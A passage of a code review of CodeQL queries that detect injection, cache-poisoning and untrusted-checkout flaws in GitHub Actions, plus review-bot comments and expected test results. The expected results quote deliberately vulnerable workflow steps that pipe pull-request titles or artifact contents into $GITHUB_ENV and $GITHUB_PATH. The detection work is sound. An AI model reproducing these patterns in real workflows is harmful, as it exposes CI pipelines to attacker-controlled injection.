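Review bot: The added `($@)` placeholder in the `select` message is unlabelled, so the rendered alert reads "...controlled by an external user (pull_request_target)" without saying that the link is the workflow's trigger event. Naming it would help triage, for example `"Potential PATH environment variable injection in $@, which may be controlled by an external user (triggered by $@)."`. The same wording is used in the EnvVarInjection, CommandInjection, ArgumentInjection, CodeInjection and ArtifactPoisoning hunks of this commit. The `where` clause that binds `event` starts outside this hunk, so it is assumed that every result has exactly one bound event.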
--- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -25,5 +25,5 @@ where check.protects(sink.getNode().asExpr(), event, "argument-injection") ) select sink.getNode(), source, sink, - "Potential argument injection in $@ command, which may be controlled by an external user.", sink, - sink.getNode().(ArgumentInjectionSink).getCommand() + "Potential argument injection in $@ command, which may be controlled by an external user ($@).", + sink, sink.getNode().(ArgumentInjectionSink).getCommand(), event, event.getName() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index a197c577948..b52c0702344 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -33,5 +33,4 @@ where ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user ($@).", sink, - sink.getNode().asExpr().(Expression).getRawExpression(), event, - event.getLocation().getFile().toString() + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index fe49b2dd3b5..23e1f223073 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -44,5 +44,5 @@ where ) ) select sink.getNode(), source, sink, - "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Unprivileged code injection in $@, which may lead to cache poisoning ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() 
diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index 74f49fccd30..95adcfaf78e 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -58,4 +58,5 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not job.isPrivileged() select step, source, step, - "Potential cache poisoning in the context of the default branch " + message + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 16fb2606af7..2aacf20b35f 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -28,4 +28,5 @@ where exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select step, checkout, step, - "Insufficient protection against execution of untrusted code on a privileged workflow." + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index d4ed49e497a..dde6ae69c48 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql 
@@ -26,4 +26,5 @@ where exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select checkout, - "Insufficient protection against execution of untrusted code on a privileged workflow." + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index e4ab90e5fc2..afef7bdd82b 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -24,5 +24,5 @@ where check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") ) select sink.getNode(), source, sink, - "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, - sink.getNode().toString() + "Potential artifact poisoning in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 07602af0ac4..c1d3729701d 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -52,5 +52,4 @@ where not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) select poisonable, checkout, poisonable, - "Execution of untrusted code on a privileged workflow ($@)", event, - event.getLocation().getFile().toString() + "Potential execution of untrusted code on a privileged workflow ($@)", event, event.getName() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 39cd1860097..98b9aee33f7 100644 
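Review bot: The new message in the UntrustedCheckoutCritical.ql `select` ends at `($@)` with no full stop, while the other alert messages touched by this commit end in `($@).`. The UntrustedCheckoutHigh.ql hunk has the same issue, and there the change also drops the full stop the old message had. For consistent alert text, use `"Potential execution of untrusted code on a privileged workflow ($@)."` in both queries. The matching `.expected` files would need regenerating after that change.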
--- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -42,4 +42,5 @@ where not event.getName() = "issue_comment" and not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) -select checkout, "Potential execution of untrusted code on a privileged workflow." +select checkout, "Potential execution of untrusted code on a privileged workflow ($@)", event, + event.getName() diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 851aa524154..f544994fc5c 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -17,8 +17,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index a79053f2240..9914ae91df1 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -93,39 +93,39 @@ nodes | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by 